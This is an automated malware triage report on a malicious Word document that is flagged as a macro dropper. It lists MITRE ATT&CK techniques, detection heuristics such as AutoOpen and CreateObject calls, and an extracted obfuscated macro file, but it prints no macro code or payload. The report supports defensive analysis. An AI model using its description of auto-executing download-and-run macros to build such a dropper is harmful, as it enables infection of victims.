Risk Score: 224 (MALICIOUS)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. An 'AutoOpen' macro is present and uses 'CreateObject' to execute code, indicating likely dropper functionality. The ClamAV signature 'Doc.Dropper.Agent-6463523-0' further confirms its malicious nature. The macro is heavily obfuscated, but its presence together with the heuristic findings strongly suggests it is designed to download and execute a second-stage payload.
Heuristics (8)
- ClamAV: Doc.Dropper.Agent-6463523-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6463523-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78236 bytes |

SHA-256: 043d88080be73daf09dfaaad6e558451bbe685f62304b5cc30cd6d207ab8a8af

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 27 long base64-like blob(s))

Preview script: first 1,000 lines of the extracted script